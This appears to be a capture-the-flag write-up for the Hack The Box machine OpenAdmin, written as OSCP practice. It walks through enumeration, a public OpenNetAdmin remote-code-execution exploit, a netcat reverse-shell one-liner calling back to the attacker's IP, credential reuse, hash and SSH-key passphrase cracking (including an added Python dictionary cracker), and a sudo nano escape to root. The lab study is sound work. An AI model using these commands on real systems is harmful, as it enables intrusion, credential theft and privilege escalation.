Hack The Box — OpenAdmin — without Metasploit (TJNull’s list for OSCP)
This is my 20th write-up, covering OpenAdmin, a machine from TJNull's list of HackTheBox machines for OSCP practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.
nmap -p- -T4 openadmin.htb --max-retries=0
Only ports 22 and 80 are open. Let's run a targeted scan (default scripts, version detection) on those two ports.
nmap -sC -sV -T4 -A -p22,80 openadmin.htb
We have Apache httpd 2.4.29 on port 80 and OpenSSH 7.6p1 on port 22. Let's go to the web server and see what we have there.
Default Apache2 page. Let’s run a gobuster scan, since this tool has become my new favorite.
gobuster dir -u http://openadmin.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error
So we found several directories. Let’s check them one by one.
/music
Just a page with nothing important.
(Note: I wasted a lot of time here enumerating, checking the page source of this page along with /artwork and /sierra, but I am going to skip all that.)
The login button on this /music page leads to the /ona directory.
The title of this page is OpenNetAdmin, and the page also reveals the version: 18.1.1.
Initial Foothold
Let's search for an exploit for this version of OpenNetAdmin. A quick Google search turns up this exploit on GitHub.
https://github.com/amriunix/ona-rce
Let’s try this exploit.
This Python exploit takes a mode (either check or exploit) and the target URL. Let's run the check first.
python ona-rce.py check http://openadmin.htb/ona
The target appears to be vulnerable. Let's run it in exploit mode.
That gives us command execution on the target, but the exploit's shell is awkward to work in. Start a netcat listener on port 4242 on our machine, then run the following from the exploit's prompt to get a reverse shell (10.10.16.32 is our tun0 address).
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.32 4242 >/tmp/f
We got a reverse shell. Let's upgrade it to a proper PTY with Python.
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Let’s see what users we have on the target.
cat /etc/passwd
Besides root, there are two regular users: jimmy and joanna.
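As an added example (not part of the original write-up), here is a small Python script that does this user triage automatically: it parses /etc/passwd, drops system accounts that have a nologin shell or a UID below the regular-user range, and lists the accounts worth going after together with their home directories. The passwd excerpt is constructed for the example and is not the box's real file; the names jimmy and joanna are used only to mirror the text.

```python
# Constructed /etc/passwd excerpt for this example; it is not the box's real
# file, and the names are only chosen to mirror the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:joanna:/home/joanna:/bin/bash
"""

# Shells that cannot be used for an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text):
    """Parse passwd-format text into a list of dicts, skipping malformed lines."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        try:
            users.append({"name": name, "uid": int(uid), "gid": int(gid),
                          "gecos": gecos, "home": home, "shell": shell})
        except ValueError:
            # Non-numeric UID/GID: not a valid passwd entry.
            continue
    return users


def interesting_accounts(users, uid_min=1000):
    """Return names of accounts with an interactive shell: root plus regular
    users (UID >= uid_min, the Debian/Ubuntu default). System accounts are dropped."""
    return [u["name"] for u in users
            if u["shell"] not in NOLOGIN_SHELLS and (u["uid"] == 0 or u["uid"] >= uid_min)]


def home_dirs(users, names):
    """Map each selected account to its home directory, for the next enumeration step."""
    return {u["name"]: u["home"] for u in users if u["name"] in names}


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    targets = interesting_accounts(users)
    print(targets, home_dirs(users, targets))
```

On a real target you would feed it the file itself (`parse_passwd(open("/etc/passwd").read())`); the UID cut-off is a distribution convention, so adjust `uid_min` if the box uses a different range.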
Let’s see what we have in their home directories.
We cannot read their home directories; our low-privileged shell has no read permission on them.
(Note: Again, I wasted a lot of time enumerating the target machine, running LinPEAS and LinEnum, but I will skip all that.)
If we look at the web root in /var/www,
there is an internal directory that only jimmy can read. So we probably need his credentials first.
Back in the /ona directory,
there is a local directory with a config directory inside it, containing the file database_settings.inc.php (i.e. /var/www/ona/local/config/database_settings.inc.php).
It holds the application's database credentials. Passwords are frequently reused, and jimmy seems to be the one administering the services, so let's try the database password for jimmy over SSH.
ssh jimmy@openadmin.htb
And we are jimmy!
Let's see what commands jimmy can run with sudo.
sudo -l
jimmy can't run any commands with sudo.
Let's enumerate /etc/apache2.
Here we have the sites-enabled directory.
Let’s check internal.conf
It defines a virtual host named internal.openadmin.htb that listens only on localhost:52846 and runs as user joanna, with DocumentRoot set to /var/www/internal, the directory we noticed earlier that jimmy has access to. Anything we upload there through jimmy therefore runs as joanna.
Let’s see what we have in /var/www/internal
Since port 52846 is bound to localhost on the target, we cannot reach it directly; let's tunnel it through jimmy's SSH access and see what the web service serves.
On our Kali machine we use SSH local port forwarding.
ssh -N -L <kali tun0 ip>:8090:127.0.0.1:52846 jimmy@openadmin.htb
This binds port 8090 on our Kali box (on the tun0 address) and forwards every connection to 127.0.0.1:52846 on the target through the SSH session. Now we visit port 8090 in a browser.
We get a login page. That is probably the index.php in /var/www/internal. Let's read that file from our SSH session on the target.
The login check compares the submitted credentials against a hardcoded username and a hardcoded password hash. Let's crack that hash using crackstation.com, which is a lookup table of precomputed hashes and therefore only works when the hash is unsalted.
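The same attack can be done offline, which matters when the hash is not in crackstation's tables or when you cannot send it to a third party. The following Python script, added here and not part of the original write-up, infers the algorithm from the hex digest length and tries each candidate from a wordlist. The digest and wordlist are constructed for the example; they are not the values from index.php.

```python
import hashlib

# Constructed for this example: an unsalted SHA-512 digest of a dictionary
# word and a tiny wordlist. Neither is the hash or the password from index.php.
SAMPLE_HASH = hashlib.sha512(b"password1").hexdigest()
SAMPLE_WORDLIST = ["letmein", "123456", "password", "password1", "qwerty"]

# Bare hex digests of the common unsalted algorithms can be told apart by length.
ALGO_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def guess_algorithm(digest_hex):
    """Return the likely hash algorithm for a bare hex digest, or None."""
    digest_hex = digest_hex.strip()
    if not digest_hex or any(c not in "0123456789abcdefABCDEF" for c in digest_hex):
        return None
    return ALGO_BY_HEX_LEN.get(len(digest_hex))


def iter_wordlist(path, encoding="latin-1"):
    """Yield candidate passwords from a wordlist file such as rockyou.txt."""
    with open(path, encoding=encoding, errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def crack_unsalted(digest_hex, candidates):
    """Dictionary attack against an unsalted hash.

    Returns the matching candidate, or None if the algorithm is unknown or
    nothing matches. This only works because the hash is unsalted and fast;
    a salted, slow hash (bcrypt, scrypt, argon2) defeats lookup tables and
    makes every guess far more expensive.
    """
    algo = guess_algorithm(digest_hex)
    if algo is None:
        return None
    target = digest_hex.strip().lower()
    for word in candidates:
        if hashlib.new(algo, word.encode("utf-8", "ignore")).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    print(guess_algorithm(SAMPLE_HASH), crack_unsalted(SAMPLE_HASH, SAMPLE_WORDLIST))
```

Against a real hash you would call `crack_unsalted(hash_from_index_php, iter_wordlist("/usr/share/wordlists/rockyou.txt"))`; the generator keeps memory flat even for large wordlists.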
So the username is jimmy and the password is revealed. Let's log in.
We get an encrypted RSA private key. Let's copy it and convert it to John format using ssh2john.
ssh2john encrypted_rsa > john_encrypted_rsa
Then
john john_encrypted_rsa -w=/usr/share/wordlists/rockyou.txt --format=SSH
We got the passphrase. Since the internal vhost runs as joanna, the key is most likely hers; let's SSH in as joanna using the key and the passphrase.
ssh joanna@openadmin.htb -i encrypted_rsa
And we are joanna. Let's see what commands joanna can run with sudo.
sudo -l
joanna can run /bin/nano /opt/priv as root via sudo. According to GTFOBins, nano can spawn a shell with the following technique, and because nano runs as root, so will the shell.
Let's do that.
sudo /bin/nano /opt/priv
Inside nano press Ctrl+R (read file), then Ctrl+X (execute command), and at the command prompt enter: reset; sh 1>&0 2>&0
And we are root. Run clear to tidy up the terminal, then /bin/bash for a proper bash session. :)